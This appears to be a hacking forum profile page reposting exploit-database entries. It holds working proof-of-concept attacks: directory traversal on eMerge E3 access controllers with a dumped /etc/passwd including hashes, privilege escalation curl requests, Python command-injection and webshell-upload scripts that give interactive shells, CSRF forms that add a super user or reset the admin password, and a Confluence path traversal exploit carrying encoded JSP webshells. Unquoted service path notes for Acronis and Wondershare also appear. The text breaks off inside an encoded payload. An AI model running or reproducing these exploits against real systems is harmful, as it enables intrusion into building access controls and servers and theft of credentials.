Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    eMerge E3 1.00-06 - Unauthenticated Directory Traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: eMerge E3 1.00-06 - Unauthenticated Directory Traversal # Google Dork: NA # Date: 2018-09-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 1.00-06 # Tested on: NA # CVE : CVE-2019-7254 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 # PoC GET /?c=../../../../../../etc/passwd%00 Host: 192.168.1.2 root:$1$VVtYRWvv$gyIQsOnvSv53KQwzEfZpJ0:0:100:root:/root:/bin/sh bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/home/default: e3user:$1$vR6H2PUd$52r03jiYrM6m5Bff03yT0/:1000:1000:Linux User,,,:/home/e3user:/bin/sh lighttpd:$1$vqbixaUx$id5O6Pnoi5/fXQzE484CP1:1001:1000:Linux User,,,:/home/lighttpd:/bin/sh curl -s http://192.168.1.3/badging/badge_print_v0.php?tpl=../../../../../etc/passwd curl -s http://192.168.1.2/badging/badge_template_print.php?tpl=../../../../../etc/version curl -s http://192.168.1.2/badging/badge_template_v0.php?layout=../../../../../../../etc/issue curl -s http://192.168.1.2/?c=../../../../../../etc/passwd%00
  2. HireHackking

    Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path # Date: 2019-11-11 # Author: Alejandra Sánchez # Vendor Homepage: https://www.acronis.com # Software: ftp://supportdownload:supportdownload@ftp.kingston.com/AcronisTrueImageOEM_5128.exe # Version: 19.0.5128 # Tested on: Windows 10 # Description: # Acronis True Image OEM 19.0.5128 suffers from an unquoted search path issue impacting the service 'afcdpsrv'. This could potentially allow an # authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require # the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could # potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges # of the application. # Prerequisites # Local, Non-privileged Local User with restart capabilities # Details C:\>wmic service get name, pathname, displayname, startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ Acronis Nonstop Backup Service afcdpsrv C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe Auto C:\>sc qc afcdpsrv [SC] QueryServiceConfig SUCCESS SERVICE_NAME: afcdpsrv TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Acronis Nonstop Backup Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  3. HireHackking

    eMerge E3 1.00-06 - Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: eMerge E3 1.00-06 - Privilege Escalation # Google Dork: NA # Date: 2018-09-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 1.00-06 # Tested on: NA # CVE : CVE-2019-7254, CVE-2019-7259 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 # PoC # Escalate: curl "http://192.168.1.2/?c=webuser&m=update" -X POST –-data "No=3&ID=test&Password=test&Name=test&UserRole=1&Language=en&DefaultPage=sitemap&DefaultFloorNo=1&DefaultFloorState=1&AutoDisconnectTime=24" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1 Disclose: curl "http://192.168.1.2/?c=webuser&m=select&p=&f=&w=&v=1" -H "Cookie: PHPSESSID=d3dda96fc70846b2a7895ffa5ee9aa54; last_floor=1
  4. HireHackking

    Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path # Google Dork: N/A # Date: 2019-11-11 # Exploit Author: chuyreds # Vendor Homepage: https://www.wondershare.com/ # Software Link: https://www.wondershare.com/drfone/ # Version: 2.4.3.231 # Tested on: Windows 10 Home Single Language # CVE : N/A # Explot-Wondershare WsAppService.txt #Service Info: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Wondershare Application Framework Service WsAppService C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe Auto C:\Users\user>sc query WsAppService NOMBRE_SERVICIO: WsAppService TIPO : 10 WIN32_OWN_PROCESS ESTADO : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) CÓD_SALIDA_WIN32 : 0 (0x0) CÓD_SALIDA_SERVICIO: 0 (0x0) PUNTO_COMPROB. : 0x0 INDICACIÓN_INICIO : 0x0
  5. HireHackking

    eMerge E3 1.00-06 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: eMerge E3 1.00-06 - Remote Code Execution # Google Dork: NA # Date: 2018-09-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 1.00-06 # Tested on: NA # CVE : CVE-2019-7256 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 #!/usr/bin/env python # ################################################################### # lqwrm@metalgear:~/stuff$ python emergeroot1.py 192.168.1.2 # # lighttpd@192.168.1.2:/spider/web/webroot$ id # uid=1003(lighttpd) gid=0(root) # # lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id # Password: # uid=0(root) gid=0(root) groups=0(root) # # lighttpd@192.168.1.2:/spider/web/webroot$ exit # # [+] Erasing read stage file and exiting... # [+] Done. Ba-bye! # ################################################################### import requests import sys,os## piton = os.path.basename(sys.argv[0]) if len(sys.argv) < 2: print '\n\x20\x20[*] Usage: '+piton+' <ipaddress:port>\n' sys.exit() ipaddr = sys.argv[1] print while True: try: cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ') execute = requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60'+cmd+' > test.txt%60') readreq = requests.get('http://'+ipaddr+'/test.txt') print readreq.text if cmd.strip() == 'exit': print "[+] Erasing read stage file and exiting..." requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60rm test.txt%60') print "[+] Done. Ba-bye!\n" break else: continue except Exception: break sys.exit()
  6. HireHackking

    eMerge E3 1.00-06 - Cross-Site Request Forgery

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: eMerge E3 1.00-06 - Cross-Site Request Forgery # Google Dork: NA # Date: 2018-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 1.00-06 # Tested on: NA # CVE : CVE-2019-7262 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 # PoC # Nortek Linear eMerge E3 Access Control Cross-Site Request Forgery <!-- CSRF Add Super User --> <html> <body> <form action="http://192.168.1.2/?c=webuser&m=insert" method="POST"> <input type="hidden" name="No" value="" /> <input type="hidden" name="ID" value="hax0r" /> <input type="hidden" name="Password" value="hax1n" /> <input type="hidden" name="Name" value="CSRF" /> <input type="hidden" name="UserRole" value="1" /> <input type="hidden" name="Language" value="en" /> <input type="hidden" name="DefaultPage" value="sitemap" /> <input type="hidden" name="DefaultFloorNo" value="1" /> <input type="hidden" name="DefaultFloorState" value="1" /> <input type="hidden" name="AutoDisconnectTime" value="24" /> <input type="submit" value="Add Super User" /> </form> </body> </html> <!-- CSRF Change Admin Password --> <html> <body> <form action="http://192.168.1.2/?c=webuser&m=update" method="POST"> <input type="hidden" name="No" value="1" /> <input type="hidden" name="ID" value="admin" /> <input type="hidden" name="Password" value="backdoor" /> <input type="hidden" name="Name" value="admin" /> <input type="hidden" name="UserRole" value="1" /> <input type="hidden" name="Language" value="en" /> <input type="hidden" name="DefaultPage" value="sitemap" /> <input type="hidden" name="DefaultFloorNo" value="1" /> <input type="hidden" name="DefaultFloorState" value="1" /> <input type="hidden" name="AutoDisconnectTime" value="24" /> <input type="submit" value="Change Admin Password" /> </form> </body> </html>
  7. HireHackking

    eMerge E3 1.00-06 - Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: eMerge E3 1.00-06 - Arbitrary File Upload # Google Dork: NA # Date: 2018-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 1.00-06 # Tested on: NA # CVE : CVE-2019-7257 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 # PoC ##################################################################### # # lqwrm@metalgear:~/stuff$ python e3upload.py 192.168.1.2 # Starting exploit at 17.01.2019 13:04:17 # # lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ id # uid=1003(lighttpd) gid=0(root) # # lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ echo davestyle | su -c id # Password: # uid=0(root) gid=0(root) groups=0(root) # # lighttpd@192.168.1.2:/spider/web/webroot/badging/bg$ exit # # [+] Deleting webshell.php file... # [+] Done! # ##################################################################### import datetime import requests import sys##### import os###### piton = os.path.basename(sys.argv[0]) badge = "/badging/badge_layout_new_v0.php" shell = "/badging/bg/webshell.php" if len(sys.argv) < 2: print "\n\x20\x20[*] Usage: "+piton+" <ipaddress:port>\n" sys.exit() ipaddr = sys.argv[1] vremetodeneska = datetime.datetime.now() print "Starting exploit at "+vremetodeneska.strftime("%d.%m.%Y %H:%M:%S") print while True: try: target = "http://"+ipaddr+badge headers = {"User-Agent": "Brozilla/16.0", "Accept": "anything", "Accept-Language": "mk-MK,mk;q=0.7", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=----j", "Connection": "close"} payload = ("------j\r\nContent-Disposition: form-da" "ta; name=\"layout_name\"\r\n\r\nwebshel" "l.php\r\n------j\r\nContent-Disposition" ": form-data; name=\"bg\"; filename=\"we" "bshell.php\"\r\nContent-Type: applicati" "on/octet-stream\r\n\r\n<?\nif($_GET['cm" "d']) {\n system($_GET['cmd']);\n }\n?" ">\n\r\n------j--\r\n") requests.post(target, headers=headers, data=payload) cmd = raw_input("lighttpd@"+ipaddr+":/spider/web/webroot/badging/bg$ ") execute = requests.get("http://"+ipaddr+shell+"?cmd="+cmd) print execute.text if cmd.strip() == "exit": print "[+] Deleting webshell.php file..." requests.get("http://"+ipaddr+shell+"?cmd=rm%20webshell.php") print "[+] Done!\n" break else: continue except Exception: print "Error!" break sys.exit()
  8. HireHackking

    Atlassian Confluence 6.15.1 - Directory Traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Atlassian Confluence 6.15.1 - Directory Traversal # Google Dork: N/A # Date: 2019-11-11 # Exploit Author: max7253 # Vendor Homepage: https://www.atlassian.com # Software Link: https://www.atlassian.com/software/confluence/download-archives # Version: 6.15.1 # Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, Linux 5.0.0-23-generic #24~18.04.1-Ubuntu # CVE : 2019-3398 #Confluence Arbitrary File Write via Path Traversal (CVE-2019-3398) #To use this exploit you should specify the following variables: #OS - Linux or Windows. #PROTO - http or https. #USERNAME and PASSWORD - the login/password to log into the web interface of the Atlassian Confluence server. #HOSTNAME - the domain name or IP address of the server and its port. #ROOTFOLDER - the root directory of the web server. If the root directory is located in C:\confluence\pages\, set this variable to ROOTFOLDER = 'confluence/pages/'. #Typical ROOTFOLDER locations are: #Windows: Program Files/Atlassian/Confluence/confluence/pages/ #Linux: opt/atlassian/confluence/confluence/pages/ #Note that the root directory of the web server and the temporary directory of the Atlassian Confluence server on Windows must be on the same drive (C:\ in the example above). #PAGEID - the pageId URL parameter you see in the browser address bar when you vist the Atlassian Confluence page where you have rights to upload files. #For example, https://server.net/pages/viewpageattachments.action?pageId=111111111&metadataLink=true. #If PAGEID is set to 0, the script will try to create a new Page ID in one of the available spaces. If it fails, it will try to create a new space and create a Page ID there. #If PAGEID is not specified, the script will walk though the PAGEID_RANGE_START..PAGEID_RANGE_END range and try to upload shellcode till it succeeds. #The script gets authenticated to the Atlassian Confluence server, retrieves the ATLASSIAN TOKEN from the server response, uploads the webshell, then imitates the 'Download all' action to place the webshell to the root directory of the web server. #Tested on Atlassian v6.15.1. on Linux and Windows. #Note that on Linux Confluence runs under the 'confluence' account which may not have rights to save files in the root directory of the web server. In this case the exploit will fail. Also, to create a new space and get the list of existing spaces the script makes use of Confluence REST API, which is available starting from Confluence Server 5.5. import requests import urllib3 import base64 from bs4 import BeautifulSoup import numpy as np import re import json urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) OS = 'Windows' #change this parameter PROTO = 'http' #change this parameter USERNAME = 'test' #change this parameter PASSWORD = 'test' #change this parameter HOSTNAME = '192.168.198.144:8090' #change this parameter ROOTFOLDER = 'Program Files/Atlassian/Confluence/confluence/pages/' #change this parameter (Windows) #ROOTFOLDER = 'opt/atlassian/confluence/confluence/pages/' #change this parameter (Linux) PAGEID = '0'#'1245201' #change this parameter PAGEID_RANGE_START = np.int64(1) #change this parameter PAGEID_RANGE_END = np.int64(999999999999) #change this parameter ATLTOKEN = '' LOGINURL = '%s://%s/dologin.action' % (PROTO, HOSTNAME) UPLOADURL = '%s://%s/plugins/drag-and-drop/upload.action' % (PROTO, HOSTNAME) DOWNLOADALLURL = '%s://%s/pages/downloadallattachments.action' % (PROTO, HOSTNAME) CREATEPAGEURL = '%s://%s/pages/createpage.action?spaceKey=' % (PROTO, HOSTNAME) VIEWSPACESURL= '%s://%s/rest/api/space' % (PROTO, HOSTNAME) WEBSHELLURL = '%s://%s/pages/assist.jsp' % (PROTO, HOSTNAME) SHELLCODE_WINDOWS = 'PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLiosamF2YS5uZXQuKiIlPgo8SFRNTD \ 48Qk9EWT4KPEZPUk0gTUVUSE9EPSJQT1NUIiBOQU1FPSJib29raW5nIiBBQ1RJT049IiI+CjxJTlBV \ VCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZC \ I+CjwvRk9STT4gCjxwcmU+CjwlIApcdTAwNjlcdTAwNjZcdTAwMjBcdTAwMjhcdTAwNzJcdTAwNjVc \ dTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNT \ BcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAw \ MjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAwMjlcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdT \ AwNkVcdTAwNzVcdTAwNkNcdTAwNkNcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBcdTAwMjBc \ dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMk \ VcdTAwNzBcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwMjJcdTAw \ NDNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAwM0FcdTAwMjBcdTAwMjJcdT \ AwMjBcdTAwMkJcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRc \ dTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNj \ VcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAw \ MjlcdTAwMjBcdTAwMkJcdTAwMjBcdTAwMjJcdTAwNUNcdTAwNkVcdTAwM0NcdTAwNDJcdTAwNTJcdT \ AwM0VcdTAwMjJcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMDlcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlc \ dTAwNkVcdTAwNjdcdTAwNUJcdTAwNURcdTAwMjBcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNj \ FcdTAwNkVcdTAwNjRcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNjVcdTAwNzdcdTAwMjBcdTAw \ NTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNjdcdTAwNUJcdTAwNURcdTAwMjBcdTAwN0JcdT \ AwMjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMkVcdTAwNjVcdTAwNzhcdTAwNjVcdTAwMjJcdTAwMkNc \ dTAwMjBcdTAwMjJcdTAwMkZcdTAwNjNcdTAwMjJcdTAwMkNcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNz \ FcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAw \ NjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdT \ AwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAwMjlcdTAwN0RcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBc \ dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNTBcdTAwNzJcdTAwNkZcdTAwNj \ NcdTAwNjVcdTAwNzNcdTAwNzNcdTAwMjBcdTAwNzBcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNTJcdTAw \ NzVcdTAwNkVcdTAwNzRcdTAwNjlcdTAwNkRcdTAwNjVcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdT \ AwNTJcdTAwNzVcdTAwNkVcdTAwNzRcdTAwNjlcdTAwNkRcdTAwNjVcdTAwMjhcdTAwMjlcdTAwMkVc \ dTAwNjVcdTAwNzhcdTAwNjVcdTAwNjNcdTAwMjhcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNj \ FcdTAwNkVcdTAwNjRcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \ MjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNEZcdTAwNzVcdTAwNzRcdTAwNzBcdTAwNzVcdTAwNzRcdT \ AwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNkZcdTAwNzNcdTAwMjBc \ dTAwM0RcdTAwMjBcdTAwNzBcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNEZcdTAwNzVcdTAwNz \ RcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAw \ MjhcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdT \ AwMjBcdTAwMjBcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJc \ dTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNjlcdTAwNkVcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNz \ BcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAw \ NTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMEFcdT \ AwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNDRcdTAwNjFc \ dTAwNzRcdTAwNjFcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNz \ JcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMjBcdTAwM0RcdTAw \ MjBcdTAwNkVcdTAwNjVcdTAwNzdcdTAwMjBcdTAwNDRcdTAwNjFcdTAwNzRcdTAwNjFcdTAwNDlcdT \ AwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRc \ dTAwMjhcdTAwNjlcdTAwNkVcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \ BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAw \ NjdcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNjRcdT \ AwNjlcdTAwNzNcdTAwMkVcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNjRcdTAwNENcdTAwNjlcdTAwNkVc \ dTAwNjVcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \ BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNzdcdTAwNjhcdTAwNjlcdTAwNkNcdTAwNjVcdTAwMjBcdTAw \ MjhcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdT \ AwNkVcdTAwNzVcdTAwNkNcdTAwNkNcdTAwMjBcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBc \ dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \ BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMkVcdTAw \ NzBcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwNjRcdTAwNjlcdT \ AwNzNcdTAwNzJcdTAwMjlcdTAwM0JcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBc \ dTAwM0RcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMkVcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNj \ RcdTAwNENcdTAwNjlcdTAwNkVcdTAwNjVcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMjBcdTAwN0RcdTAw \ MEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwN0QKJT \ 4KPC9wcmU+CjwvQk9EWT48L0hUTUw+' SHELLCODE_LINUX ='PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLiosamF2YS5uZXQuKiIlPgo8SFRNTD \ 48Qk9EWT4KPEZPUk0gTUVUSE9EPSJQT1NUIiBOQU1FPSJib29raW5nIiBBQ1RJT049IiI+CjxJTlBV \ VCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZC \ I+CjwvRk9STT4gCjxwcmU+CjwlIApcdTAwNjlcdTAwNjZcdTAwMjBcdTAwMjhcdTAwNzJcdTAwNjVc \ dTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNT \ BcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAw \ MjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAwMjlcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdT \ AwNkVcdTAwNzVcdTAwNkNcdTAwNkNcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBcdTAwMjBc \ dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMk \ VcdTAwNzBcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwMjJcdTAw \ NDNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAwM0FcdTAwMjBcdTAwMjJcdT \ AwMjBcdTAwMkJcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRc \ dTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNj \ VcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAw \ MjlcdTAwMjBcdTAwMkJcdTAwMjBcdTAwMjJcdTAwNUNcdTAwNkVcdTAwM0NcdTAwNDJcdTAwNTJcdT \ AwM0VcdTAwMjJcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBc \ dTAwMjBcdTAwMjBcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNjdcdTAwNU \ JcdTAwNURcdTAwMjBcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAw \ MjBcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNjVcdTAwNzdcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdT \ AwNjlcdTAwNkVcdTAwNjdcdTAwNUJcdTAwNURcdTAwMjBcdTAwN0JcdTAwMjJcdTAwMkZcdTAwNjJc \ dTAwNjlcdTAwNkVcdTAwMkZcdTAwNzNcdTAwNjhcdTAwMjJcdTAwMkNcdTAwMjBcdTAwMjJcdTAwMk \ RcdTAwNjNcdTAwMjJcdTAwMkNcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNzFcdTAwNzVcdTAwNjVcdTAw \ NzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAwNjFcdTAwNzJcdTAwNjFcdT \ AwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdTAwNjNcdTAwNkRcdTAwNjRc \ dTAwMjJcdTAwMjlcdTAwN0RcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \ BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNTBcdTAwNzJcdTAwNkZcdTAwNjNcdTAwNjVcdTAwNzNcdTAw \ NzNcdTAwMjBcdTAwNzBcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNTJcdTAwNzVcdTAwNkVcdTAwNzRcdT \ AwNjlcdTAwNkRcdTAwNjVcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTJcdTAwNzVcdTAwNkVc \ dTAwNzRcdTAwNjlcdTAwNkRcdTAwNjVcdTAwMjhcdTAwMjlcdTAwMkVcdTAwNjVcdTAwNzhcdTAwNj \ VcdTAwNjNcdTAwMjhcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAw \ MjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdT \ 